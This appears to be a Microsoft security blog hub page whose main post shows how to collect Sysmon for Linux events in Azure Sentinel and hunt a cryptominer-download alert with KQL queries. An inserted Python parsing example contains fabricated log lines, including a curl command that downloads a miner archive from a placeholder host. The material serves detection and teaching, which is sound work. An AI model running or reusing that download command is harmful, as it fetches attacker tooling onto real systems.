Hunting
64 Topics

Automating the deployment of Sysmon for Linux 🐧 and Azure Sentinel in a lab environment 🧪
Today, we celebrate 25 years of Sysinternals, a set of utilities to analyze, troubleshoot and optimize Windows systems and applications. Also, as part of this special anniversary, we are releasing Sysmon for Linux, an open-source system monitor tool developed to collect security events from Linux environments using eBPF (Extended Berkeley Packet Filter) and send them to Syslog for easy consumption. Sysmon for Linux is built on a library also released today named sysinternalsEBPF, which is built on libbpf and includes a library of eBPF inline functions used as helpers. In this post, I will show you how to automatically deploy a research lab environment with an Azure Sentinel instance and a few Linux virtual machines with Sysmon for Linux already installed and configured, to take it for a drive and explore its coverage.

A Quick Guide on Using Sysmon for Linux in Azure Sentinel
Jessen Kurien - Microsoft Threat Intelligence Center

Thanks to Kevin Sheldrake, Russell McDonald, Roberto Rodriguez and Ofer Shezaf for making this blog possible.

Today, Linux is one of the fastest growing platforms on Azure. Linux-based images form over 60% of Azure Marketplace images. With Azure's support of common Linux distributions growing every day, the sophistication of cyber-attacks targeting Linux continues to grow. As part of the Sysinternals 25th anniversary, the Sysinternals team released a new Sysmon tool supporting Linux. Sysmon for Linux is an open-source Linux system monitoring tool that provides details on process creations, network connections, file creations and deletions, among other things. Sysmon for Linux is based on eBPF (Extended Berkeley Packet Filter), a technology targeted at in-kernel monitoring without making any changes to the kernel source code. By collecting the events it generates using Azure Sentinel and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network. Sysmon for Linux can be used to analyze pre-compromise and post-compromise activity, and when correlated with Azure Security Center (ASC)/Azure Defender (AzD) Linux detections it helps detect end-to-end attacker activity. In this blog post we will take a quick look at the different log events made available by Sysmon for Linux that defenders can use to gather more information on the alerts triggered in Azure Sentinel.
In Azure Sentinel, alerts can be viewed under Threat Management > Incidents. A summarized graphical threat view is also available under the Security Operations Efficiency tab. If there are potential events observed from sources that are malicious, Azure Sentinel will alert you on the map.

Sysmon is supported by Azure Sentinel and the Azure Sentinel Information Model (ASim), ensuring Sysmon data is analyzed by built-in analytics and is easy to query. It is important to enable Sysmon event collection for parsing; it can be configured using the steps below:

- Configure Syslog collection using the Log Analytics agent.
- Deploy the Sysmon ASim parser pack, or better yet, all ASim parsers in a single package.

Enriching the investigation of an alert

For example, let's look at one of the alerts, 'Possible Cryptocoinminer download detected', that we had shown in the Incidents tab. This alert will trigger on any cryptocoin mining download activity observed in the network. To investigate an alert like this using Azure Sentinel we need to use some of the events generated by Sysmon. Below are some of the events made available with the Sysmon for Linux release. It's important to note that you need to set the different events that you want in the Sysmon config. More details on the steps can be found under the OSSEM (Open Source Security Events Metadata) project. For this blog, we have configured Sysmon to collect Process Create and Network Connection events, which we show as part of a quick alert analysis.

1 – Process Create: The process creation event provides extended information about a newly created process.
3 – Network Connect: The network connection event logs TCP/UDP connections on the machine. The event also contains the source and destination host names, IP (Internet Protocol) addresses, port numbers and IPv6 (Internet Protocol Version 6) status.
5 – Process Terminate: The process terminate event reports when a process terminates. It provides the UtcTime, ProcessGuid and ProcessId of the process.
9 – Raw Access Read: The RawAccessRead event detects when a process conducts reading operations from the drive using the \\.\ denotation. This technique is often used by malware for data exfiltration of files that are locked for reading, as well as to avoid file access auditing tools. The event indicates the source process and target device.
10 – Access Process: The process accessed event reports when a process opens another process, an operation that's often followed by information queries or reading and writing the address space of the target process.
11 – File Create: File create operations are logged when a file is created or overwritten. This event is useful for monitoring AutoStart locations, like the Startup folder, as well as temporary and download directories, which are common places where malware drops files during initial infection.
23 – File Delete: A file was deleted. This is a helpful event when attackers try to cover their tracks, and even for finding anomalies from high-privilege monitoring machines.

Once the events are set up and being collected in Azure Sentinel, we can run a query like the one below to view all the process create logs that triggered around the time of the alert. We can see the download related to crypto mining activity along with other enumeration commands, which can be used to learn more about what the attackers did and help reveal more details of the attack. You can always set the time span in the 'Time Range' column in Azure Sentinel.

vimProcessCreateLinuxSysmon
| where Computer =~ "UBUNTU18ASCSYSMON"
| summarize count() by Computer, CommandLine, Process

We can also view the network connection logs around the timeline of the attack by using a query like the one below to find the source of the attack and potential enumeration activity within the network. A similar approach can be taken to analyze attacker activity with the other log sources made available using Sysmon for Linux.
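The two summaries, the process-create query above and the network-connection query that follows, reproduced offline as an added Python example (not code from the blog post or the Sysmon project) over constructed Sysmon for Linux syslog lines; the hostnames, paths, addresses and the raw-field-to-ASim-column mapping are assumptions made for the example.

```python
import re
import xml.etree.ElementTree as ET
from collections import Counter

# Constructed sample (hostnames, paths and addresses are made up) in the shape Sysmon for Linux
# writes to syslog: a syslog header followed by one XML <Event> document per line.
SAMPLE_SYSLOG = """\
Oct 18 10:00:01 ubuntu18 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>ubuntu18</Computer></System><EventData><Data Name="Image">/usr/bin/curl</Data><Data Name="CommandLine">curl -sO http://files.example/miner.tar.gz</Data><Data Name="User">www-data</Data></EventData></Event>
Oct 18 10:00:01 ubuntu18 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>3</EventID><Computer>ubuntu18</Computer></System><EventData><Data Name="Image">/usr/bin/curl</Data><Data Name="Protocol">tcp</Data><Data Name="SourceIp">10.0.0.5</Data><Data Name="DestinationIp">198.51.100.7</Data><Data Name="DestinationPort">80</Data></EventData></Event>
Oct 18 10:00:02 ubuntu18 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>ubuntu18</Computer></System><EventData><Data Name="Image">/usr/bin/curl</Data><Data Name="CommandLine">curl -sO http://files.example/miner.tar.gz</Data><Data Name="User">www-data</Data></EventData></Event>
Oct 18 10:00:03 ubuntu18 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>ubuntu18</Computer></System><EventData><Data Name="Image">/usr/bin/uname</Data><Data Name="CommandLine">uname -a</Data><Data Name="User">www-data</Data></EventData></Event>
Oct 18 10:00:04 otherhost sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>otherhost</Computer></System><EventData><Data Name="Image">/bin/ls</Data><Data Name="CommandLine">ls -la</Data></EventData></Event>
"""

# Raw Sysmon field names renamed to the ASim columns used in the vim*LinuxSysmon queries
# (assumed mapping for this example; the ASim parsers themselves define the real one).
ASIM_NAMES = {"Image": "Process", "SourceIp": "SrcIpAddr", "DestinationIp": "DstIpAddr"}

def parse_events(syslog_text):
    """Pull each <Event> out of the syslog text and flatten it into a dict of columns."""
    events = []
    for match in re.finditer(r"<Event>.*?</Event>", syslog_text):
        root = ET.fromstring(match.group(0))
        event = {"EventID": int(root.findtext("System/EventID")),
                 "Computer": root.findtext("System/Computer")}
        for data in root.iter("Data"):  # <Data Name="..."> children of <EventData>
            event[ASIM_NAMES.get(data.get("Name"), data.get("Name"))] = data.text
        events.append(event)
    return events

def summarize(events, event_id, computer, columns):
    """Mirror `| where Computer =~ computer | summarize count() by columns` (=~ ignores case)."""
    counts = Counter()
    for e in events:
        if e["EventID"] == event_id and e["Computer"].lower() == computer.lower():
            counts[tuple(e.get(c) for c in columns)] += 1
    return counts

def process_create_summary(syslog_text, computer):  # the vimProcessCreateLinuxSysmon query
    return summarize(parse_events(syslog_text), 1, computer, ("Computer", "CommandLine", "Process"))

def network_summary(syslog_text, computer):  # the vimNetworkSessionLinuxSysmon query
    return summarize(parse_events(syslog_text), 3, computer,
                     ("Computer", "Process", "SrcIpAddr", "DstIpAddr", "Protocol"))

if __name__ == "__main__":
    for key, n in process_create_summary(SAMPLE_SYSLOG, "UBUNTU18").most_common():
        print(n, key)
```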
vimNetworkSessionLinuxSysmon
| where Computer =~ "UBUNTU18ASCSYSMON"
| summarize count() by Computer, Process, SrcIpAddr, DstIpAddr, Protocol

If you would like to look at logs that triggered within a certain time span after or before the alert, a query like the one below might help in the analysis. In the query below we have joined the 'Possible Cryptocoinminer download detected' alert with the Process Create Linux Sysmon logs to reveal activities that occurred within 1 minute of the alert. A query like this can be applied to other alerts and log sources as well, to investigate the incidents previously shown under the Incidents tab.

SecurityAlert
| where AlertName == "Possible Cryptocoinminer download detected"
| summarize count() by WorkspaceSubscriptionId, CompromisedEntity = toupper(CompromisedEntity), TimeGenerated, AlertName
| join kind=inner (
    vimProcessCreateLinuxSysmon
    | project Computer = toupper(Computer), Timespan = TimeGenerated, CommandLine, Process
) on $left.CompromisedEntity == $right.Computer
| extend TimeWindow = TimeGenerated + 1m
| where Timespan between (TimeGenerated .. TimeWindow)
| project TimeWindow, CompromisedEntity, AlertName, CommandLine, Process

In our next blog post we will cover how to use Sysmon for Linux to look for a specific MITRE ATT&CK technique and what that looks like in Azure Sentinel. Please also refer to our blog post covering Sentinel2Go and how to set up Sysmon for Linux with it.

To conclude, the release of this tool is a significant step not only in the Linux open-source community space but also in the advancements to combat the rising sophistication of threats related to Linux attacks. As you start using and testing the Sysmon for Linux tool, we encourage you to provide feedback along with details on the Sysinternals GitHub page. Your feedback is critical in Microsoft's mission of building better protection and defense against cybercriminals.

References & Relevant Reading:
Sysinternals Utilities - Windows Sysinternals
What is Azure Sentinel? | Microsoft Docs
Azure-Sentinel (github.com)
Reference table for all security alerts in Azure Security Center

Protecting your Teams with Azure Sentinel
Recent events have forced many organizations (including Microsoft) to move to a work from home model for their users. In order to ensure their users remain connected and productive they are turning to productivity tools such as Microsoft Teams to host meetings, allow teams to collaborate, and to help colleagues keep in touch. Moving to, or increasing usage of, Teams means that the service should be more of a focus for defenders than ever due to its critical role in communications and data sharing. In this blog we are going to focus on how we can collect Teams activity logs with Azure Sentinel, and start hunting for suspicious activity in that Teams data.

Microsoft Sentinel API 101
Our Sentinel Management API just went GA! In this blog post we give you the 101 on the different APIs you can use to interact with Microsoft Sentinel. We'll look at how you can use them, when you should use them, what tools you can use to interact with them and how to authenticate to them.

Monitoring Zoom with Azure Sentinel
In a recent blog we talked about the explosion in usage we had seen with Microsoft Teams as the world has moved to working from home. However, Microsoft Teams is not the only application to see such a surge; Zoom is another remote productivity tool that has seen a massive increase in users, with more than 200 million daily meeting participants being reported in March. Just as Security Operations Centers (SOCs) need to monitor Microsoft Teams activity, they also need to be able to secure and monitor other productivity applications such as Zoom. One of the great features of Azure Sentinel is its ability to ingest and analyze data from any source, not just from Microsoft products. In this blog I will show you how you can collect logs from Zoom, ingest them into Azure Sentinel, and how a SOC team can start to hunt in the logs to find potentially malicious activity.